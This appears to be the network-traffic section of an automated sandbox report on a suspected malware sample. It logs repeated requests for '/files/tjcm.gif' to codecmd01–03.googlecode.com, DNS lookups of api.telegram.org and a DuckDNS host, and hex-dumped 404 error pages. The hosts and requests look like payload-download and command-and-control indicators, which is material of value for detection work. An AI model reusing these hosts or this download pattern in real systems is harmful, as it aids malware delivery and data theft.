Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: codecmd01.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: codecmd02.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: codecmd03.googlecode.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mariona.duckdns.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 